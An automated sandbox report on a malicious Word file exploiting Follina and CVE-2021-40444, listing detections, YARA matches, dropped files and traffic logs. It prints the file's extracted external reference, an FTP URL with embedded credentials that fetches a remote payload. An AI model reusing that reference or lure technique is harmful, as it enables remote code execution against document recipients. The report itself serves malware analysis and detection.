Windows Analysis Report
Bewerbung.docx

Overview

General Information

Sample Name: Bewerbung.docx
Analysis ID: 705530
MD5: e7521cc41970a93d81eb7db063563474
SHA1: 668afe1cf1ff3a6b8b9f9b0ceaa81549944bffc2
SHA256: d28398402e0b64cfb6e1f8e28cc21584eddd159690c2dab80aafae9c79201ae0
Infos:

Detection

CVE-2021-40444, Follina CVE-2022-30190
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Detected CVE-2021-40444 exploit
Antivirus detection for dropped file
Contains an external reference to another file
Connects to many ports of the same IP (likely port scanning)
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Uses FTP

Classification

AV Detection

barindex
Source: Bewerbung.docx Avira: detected
Source: Bewerbung.docx ReversingLabs: Detection: 20%
Source: Bewerbung.docx Virustotal: Detection: 9% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html Avira: detection malicious, Label: JS/CVE-2022-30190.G

Exploits

barindex
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPED
Source: document.xml.rels Extracted files from sample: mhtml:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html!x-usc:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21

Networking

barindex
Source: global traffic TCP traffic: 185.27.134.11 ports 21699,39352,1,2,50652,47790,21
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: Joe Sandbox View ASN Name: WILDCARD-ASWildcardUKLimitedGB WILDCARD-ASWildcardUKLimitedGB
Source: unknown FTP traffic detected: 185.27.134.11:21 -> 192.168.2.22:49173 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed.220-Local time is now 09:04. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed.220-Local time is now 09:04. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed.220-Local time is now 09:04. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 60 seconds of inactivity.
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{22F15F1C-2D40-4586-81FC-738423AAB483}.tmp Jump to behavior
Source: dump.pcap, type: PCAP Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: dump.pcap, type: PCAP Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: document.xml.rels, type: SAMPLE Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPED Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
